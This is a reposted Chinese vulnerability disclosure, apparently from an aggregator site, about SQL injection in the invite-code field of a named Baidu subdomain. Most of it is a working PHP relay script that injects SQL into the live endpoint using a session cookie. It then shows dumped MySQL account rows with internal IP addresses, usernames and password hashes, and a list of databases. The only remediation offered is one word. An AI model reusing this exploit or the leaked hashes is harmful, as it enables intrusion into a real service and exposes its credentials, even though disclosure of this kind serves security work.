今天看啥
热点:

百度某二级域名root权限注入漏洞


https://jpaas-edu.baidu.com/这个站 填写邀请码的地方存在注入 虽然有验证码 但是一个session内 不刷新验证码不过期中转脚本:

$querystring = "https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc"; 
$cookie_jar='Cookie: sessionid=xxxxxxx';
$querystring=str_replace(' ', '%20', $querystring);
//print $querystring;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $querystring);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_jar);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result=curl_exec($ch);
curl_close($ch);
print $result;
?>
Database: mysql
Table: user
[6 entries]
+--------------+--------+-------------------------------------------+
| Host         | User   | Password                                  |
+--------------+--------+-------------------------------------------+
| 10.50.139.13 | root   | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 10.50.141.55 | edu_rd | *5A0E47C6BA3A218EC7B929CEB437E60772DD89E1 |
| 127.0.0.1    | admin  | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1    | root   | *62F991AB07B10BD7A6C95A83E991CB912A136690 |
| localhost    | admin  | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| localhost    | root   | *62F991AB07B10BD7A6C95A83E991CB912A136690 |
+--------------+--------+-------------------------------------------+

available databases [6]:
[*] baidu_dba
[*] edu
[*] edu2
[*] information_schema
[*] mysql
[*] test

解决方案:

过滤

www.bkjia.comtruehttp://www.bkjia.com/wzaq/1002624.htmlTechArticle百度某二级域名root权限注入漏洞 https://jpaas-edu.baidu.com/这个站 填写邀请码的地方存在注入 虽然有验证码 但是一个session内 不刷新验证码不...

相关文章

相关搜索: 二级域名 漏洞 权限

帮客评论

视觉看点